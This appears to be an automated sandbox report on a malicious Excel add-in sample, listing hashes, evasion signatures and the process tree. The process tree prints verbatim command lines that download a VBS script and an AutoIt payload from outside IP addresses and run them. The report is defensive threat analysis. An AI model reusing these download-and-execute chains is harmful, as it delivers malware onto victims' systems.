Analysis

max time kernel: 139s
max time network: 154s
platform: windows10-2004_x64
resource: win10v2004-20230915-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230915-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-09-2023 16:51

Static task: static1
Behavioral task: behavioral1
Sample: 98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll
Resource: win10v2004-20230915-en
General

Target: 98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll
Size: 50KB
MD5: 8866d0e530cb613fde59c5476ea6c331
SHA1: e77beeb201303b739a9c4536514e48adc2118900
SHA256: 98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f
SHA512: 73d157aec3d94767b1f5233617d148cb440dca8ba6381c2979f4c5265273294fefad380afa9b401df80fd9661eeae643fd23448c71a66e7ceb2e796a2a4156ea
SSDEEP: 1536:9lnq2U5JsS6Nh5wFXscKjrtN/5zqGyiNwmHWR03aY:9c9HQNh5wFXscKXHRzaiNnVqY
Malware Config
Signatures

Blocklisted process makes network request (1 IoC)
Processes:
- PID 1708 WScript.exe (network flow 39)

Checks computer location settings (2 TTPs, 3 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
- me.exe: Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation
- cmd.exe: Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation
- WScript.exe: Key value queried \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000\Control Panel\International\Geo\Nation

Executes dropped EXE (3 IoCs)
Processes:
- PID 4036 me.exe
- PID 3860 ghex.exe
- PID 2856 ghex.exe

Loads dropped DLL (2 IoCs)
Processes:
- PID 4248 EXCEL.EXE (2 entries)

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 3 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
- EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
- EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
- EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Delays execution with timeout.exe (1 IoC)
Processes:
- PID 2316 timeout.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes:
- EXCEL.EXE: Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS
- EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
- EXCEL.EXE: Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

Modifies registry class (1 IoC)
Processes:
- cmd.exe: Key created \REGISTRY\USER\S-1-5-21-1574508946-349927670-1185736483-1000_Classes\Local Settings

Script User-Agent (1 IoC)
Uses user-agent string associated with script host/environment.
Processes:
- HTTP User-Agent header (network flow 39): Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: AddClipboardFormatListener (1 IoC)
Processes:
- PID 4248 EXCEL.EXE

Suspicious use of FindShellTrayWindow (2 IoCs)
Processes:
- PID 4248 EXCEL.EXE (2 entries)

Suspicious use of SetWindowsHookEx (10 IoCs)
Processes:
- PID 4248 EXCEL.EXE (10 entries)

Suspicious use of WriteProcessMemory (16 IoCs)
Processes (each source/target pair is recorded twice):
- PID 4248 EXCEL.EXE wrote to memory of PID 4036 me.exe
- PID 4036 me.exe wrote to memory of PID 3628 cmd.exe
- PID 3628 cmd.exe wrote to memory of PID 3848 curl.exe
- PID 3628 cmd.exe wrote to memory of PID 2316 timeout.exe
- PID 3628 cmd.exe wrote to memory of PID 1708 WScript.exe
- PID 1708 WScript.exe wrote to memory of PID 4624 cmd.exe
- PID 4624 cmd.exe wrote to memory of PID 3860 ghex.exe
- PID 4624 cmd.exe wrote to memory of PID 2856 ghex.exe
Processes

[depth 1] C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE (PID 4248)
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll"
  - Loads dropped DLL
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory

  [depth 2] C:\Users\Public\me.exe (PID 4036)
    Command line: C:\Users\Public\me.exe about:"<script>var b = new ActiveXObject("wscript.shell"); b.run('cmd /c C:\\Windows\\system32\\curl.exe -o c:\\users\\public\\1.vbs http://178.236.247.73/mWMepfb/123&&timeout 10&&c:\\users\\public\\1.vbs', 0); window.close();</script>"
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory

    [depth 3] C:\Windows\System32\cmd.exe (PID 3628)
      Command line: "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://178.236.247.73/mWMepfb/123&&timeout 10&&c:\users\public\1.vbs
      - Checks computer location settings
      - Modifies registry class
      - Suspicious use of WriteProcessMemory

      [depth 4] C:\Windows\system32\curl.exe (PID 3848)
        Command line: C:\Windows\system32\curl.exe -o c:\users\public\1.vbs http://178.236.247.73/mWMepfb/123

      [depth 4] C:\Windows\system32\timeout.exe (PID 2316)
        Command line: timeout 10
        - Delays execution with timeout.exe

      [depth 4] C:\Windows\System32\WScript.exe (PID 1708)
        Command line: "C:\Windows\System32\WScript.exe" "C:\users\public\1.vbs"
        - Blocklisted process makes network request
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory

        [depth 5] C:\Windows\System32\cmd.exe (PID 4624)
          Command line: "C:\Windows\System32\cmd.exe" /c mkdir c:\ghex & cd /d c:\ghex & copy c:\windows\system32\curl.exe ghex.exe & ghex -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351 & ghex -o mhmbjb.au3 http://94.228.169.143:2351/msighexmaeh & Autoit3.exe mhmbjb.au3
          - Suspicious use of WriteProcessMemory

          [depth 6] \??\c:\ghex\ghex.exe (PID 3860)
            Command line: ghex -H "User-Agent: curl" -o Autoit3.exe http://94.228.169.143:2351
            - Executes dropped EXE

          [depth 6] \??\c:\ghex\ghex.exe (PID 2856)
            Command line: ghex -o mhmbjb.au3 http://94.228.169.143:2351/msighexmaeh
            - Executes dropped EXE
Network
MITRE ATT&CK Enterprise v15
Downloads

C:\Users\Admin\AppData\Local\Temp\98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f.xll
Filesize: 50KB
MD5: 8866d0e530cb613fde59c5476ea6c331
SHA1: e77beeb201303b739a9c4536514e48adc2118900
SHA256: 98c59262ad396b4da5b0a3e82f819923f860e974f687c4fff9b852f25a56c50f
SHA512: 73d157aec3d94767b1f5233617d148cb440dca8ba6381c2979f4c5265273294fefad380afa9b401df80fd9661eeae643fd23448c71a66e7ceb2e796a2a4156ea

(no path recorded)
Filesize: 14KB
MD5: 0b4340ed812dc82ce636c00fa5c9bef2
SHA1: 51c97ebe601ef079b16bcd87af827b0be5283d96
SHA256: dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895
SHA512: d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045

(no path recorded)
Filesize: 411KB
MD5: 1c3645ebddbe2da6a32a5f9fb43a3c23
SHA1: 086f74a35d5afed78ae50cf5586fafffb7845464
SHA256: 0ba1c44d0ee5b34b45b449074cda51624150dc16b3b3c38251df6c052adba205
SHA512: ccc9534a454971db0014ba0996d837a36cda0b91db32a93d73f17097825b1ab7c973601586d06c953bc79d2863c52c7db0fb4d04e37f83581a27e1cf7284224b

(no path recorded)
Filesize: 7KB
MD5: 3097620a3397d233ac975f13d30c736a
SHA1: c8ad6cb81dfe4ec1005c2ad12550251d3f76e307
SHA256: b2cf2f92ab493c531a4ec7c0c9eb6f86cbb400f5bd63086054ab8e67336d78a7
SHA512: 0d84a9e296188f3a3d5097d851fda3aaeebdd2bfa1e57d14b7517fd795d81d139e833b87602ca81bb87bdaefe360161c70d27b49f581365bc288d2fb683542d9

(no path recorded)
Filesize: 872KB
MD5: a450a98579a0184c98f24bfe13346dd1
SHA1: 066b4770b49baa099dd03737bc0dcf27ce4e6204
SHA256: 4991fd43bc06aa10a3438615087abea5a2c864fbd017a341a9d3d8bdeb694483
SHA512: eec47eac7ee18204f8247d2ffc22d27d63259c99420cc047046793aca33be440cb290b438b9dc3282a5e57e40f5582c78ea7a051a17525626885d24629141add